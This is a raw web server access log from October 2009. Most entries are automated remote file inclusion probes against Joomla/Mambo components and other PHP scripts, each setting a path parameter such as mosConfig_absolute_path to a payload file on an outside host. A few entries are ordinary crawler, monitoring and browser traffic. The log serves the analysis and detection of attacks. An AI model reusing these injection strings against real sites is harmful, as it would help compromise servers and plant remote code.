64.150.183.219 - - [18/Oct/2009:01:19:55 -0400] "GET /logs/access_log.Q109090300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:01 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:01 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:02 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:02 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:35 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:35 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:37 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:37 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:39 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:39 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:39 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:20:39 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:01:20:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [18/Oct/2009:01:21:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [18/Oct/2009:01:21:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.3.188 - - [18/Oct/2009:01:21:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [18/Oct/2009:01:21:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
220.181.7.81 - - [18/Oct/2009:01:21:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
151.8.79.19 - - [18/Oct/2009:01:22:14 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:01:22:14 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:22:23 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:22:25 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:22:25 -0400] "GET /logs/access_log.Q109080100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:22:25 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:22:25 -0400] "GET /logs/access_log.Q109080100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:22:25 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
202.131.226.52 - - [18/Oct/2009:01:22:51 -0400] "GET //akocomments.php?mosCOnfig_absolute_path=http://iyu.fileave.com/id2.txt???????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
202.131.226.52 - - [18/Oct/2009:01:22:51 -0400] "GET /logs//akocomments.php?mosCOnfig_absolute_path=http://iyu.fileave.com/id2.txt???????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
202.131.226.52 - - [18/Oct/2009:01:22:51 -0400] "GET /logs/access_log.Q109063000%20%20//akocomments.php?mosCOnfig_absolute_path=http://iyu.fileave.com/id2.txt???????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:01:22:22 -0400] "GET /logs/error_log.Q109081000 HTTP/1.1" 200 3589363 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
128.121.225.12 - - [18/Oct/2009:01:24:06 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:24:18 -0400] "GET /logs/access_log.Q109081900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:24:18 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:24:18 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:24:34 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:24:34 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:24:34 -0400] "GET /logs/access_log.Q109081900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
123.125.66.77 - - [18/Oct/2009:01:24:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.38.243.71 - - [18/Oct/2009:01:25:08 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:08 -0400] "GET /logs/access_log.Q109080100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:13 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:14 -0400] "GET /logs/access_log.Q109080100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:14 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:17 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:33 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:33 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:25:33 -0400] "GET /logs/access_log.Q109081900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:01:26:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [18/Oct/2009:01:26:21 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:26:23 -0400] "GET /logs/access_log.Q109081900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:26:26 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:36 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:36 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:36 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:38 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:38 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:38 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:45 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:45 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:45 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:46 -0400] "GET /logs/error_log.Q109100100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:49 -0400] "GET /logs/error_log.Q109100100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:28:55 -0400] "GET /logs/error_log.Q109100100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:29:19 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:29:19 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:29:19 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:29:19 -0400] "GET /logs/access_log.Q109062400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:01:29:37 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:01:29:37 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:01:29:37 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:01:29:42 -0400] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
190.3.107.130 - - [18/Oct/2009:01:30:04 -0400] "GET /logs/access_log.Q109053100/zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:01:30:11 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:01:30:11 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:01:30:11 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:01:30:16 -0400] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:30:34 -0400] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:30:38 -0400] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:30:40 -0400] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:30:44 -0400] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:30:47 -0400] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:30:50 -0400] "GET /logs/access_log.Q109081900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:30:51 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:30:51 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:01:30:51 -0400] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:01:30:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [18/Oct/2009:01:31:06 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:01:31:06 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:01:31:06 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:01:31:06 -0400] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:31:06 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:31:08 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:31:21 -0400] "GET /logs/access_log.Q109062400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:01:31:30 -0400] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:01:31:32 -0400] "GET /logs/error_log.Q109082100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:01:31:32 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:01:31:32 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:01:31:38 -0400] "GET /logs/error_log.Q109092700%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
78.110.50.120 - - [18/Oct/2009:01:31:43 -0400] "GET /logs/access_log.Q109080200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
78.110.50.120 - - [18/Oct/2009:01:31:43 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 452 "-" "libwww-perl/5.831"
78.110.50.120 - - [18/Oct/2009:01:31:44 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 22327 "-" "libwww-perl/5.831"
78.110.50.120 - - [18/Oct/2009:01:31:48 -0400] "GET /logs/error_log.Q109080200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
75.37.129.109 - - [18/Oct/2009:01:31:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
75.37.129.109 - - [18/Oct/2009:01:31:51 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
75.37.129.109 - - [18/Oct/2009:01:31:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
75.37.129.109 - - [18/Oct/2009:01:31:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
